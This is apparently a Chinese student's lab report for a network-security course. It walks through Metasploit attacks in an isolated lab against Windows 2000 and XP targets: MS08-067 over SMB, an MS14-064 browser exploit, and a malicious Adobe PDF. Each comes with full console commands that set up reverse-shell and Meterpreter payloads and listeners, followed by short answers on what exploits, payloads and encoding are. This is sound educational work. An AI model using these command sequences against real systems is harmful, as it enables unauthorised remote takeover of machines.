2019-2020 网络对抗技术 20175207 Exp6 MSF基础应用
目录
参考:https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules/auxiliary
实验内容
一个主动攻击实践ms08_067
攻击机:kali (192.168.137.139)
靶机:Windows 2000 Professional (192.168.137.141)
- 打开MSF控制台:
msfconsole
- 启用攻击模块:
use exploit/windows/smb/ms08_067_netapi
- 设置攻击载荷:
set payload generic/shell_reverse_tcp
- 设置靶机IP:
set RHOST 192.168.137.141
- 设置攻击机IP:
set LHOST 192.168.137.139
- 设置端口:
set LPORT 8888
- 查看配置信息:
show options
- 查看可攻击的平台:
show targets
- 设置目标平台:
set target 1
exploit
- 回连成功
一个针对浏览器的攻击ms14-064
攻击机:kali (192.168.137.139)
靶机:Windows XP Professional (192.168.137.142)
- 启用攻击模块:
use exploit/windows/browser/ms14_064_ole_code_execution
- 设置攻击载荷:
set payload windows/meterpreter/reverse_tcp
set AllowPowerShellPrompt 1
set SRVHOST 192.168.137.139
set LHOST 192.168.137.139
set LPORT 8888
- 设置目标平台:
set target 0
exploit
ctrl+c
退出当前状态,sessions -i 1
获取第一个会话连接
一个针对客户端的攻击Adobe
攻击机:kali (192.168.137.139)
靶机:Windows XP Professional (192.168.137.142)
- 设置攻击模块:
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.139
set LPORT 8866
- 设置生成的pdf文件名:
set FILENAME ln5207.pdf
exploit
- 将生成的.pdf文件传送到靶机,并在靶机中打开该文件
- 退出当前模块:
back
- 进入监听模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.139
set LPORT 8866
exploit
成功应用任何一个辅助模块
- 查看辅助模块:
show auxiliary
- 选择一个模块
- 查看参数:
info
- 在靶机的浏览器中输入生成的网址
- 在攻击机上可以看到靶机系统信息
问题回答
- 用自己的话解释什么是exploit,payload,encode?
- exploit:利用一些工具和方法、通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者对靶机进行相关操作。
- payload:载荷,将恶意代码负载到别处,减少其被发现的风险。
- encode:编码,类似加密工具,使其更加难以被发现。
- 离实战还缺些什么技术或步骤?
- 限制性太强,没法灵活使用各个模块,现在的实验都是在一些前提条件下进行的才得以成功,比如说一些固定的设置(关闭防火墙,手动将生成的文件拖到靶机等),在正常的情况下,随着不定因素增多,很多攻击是无法实现的。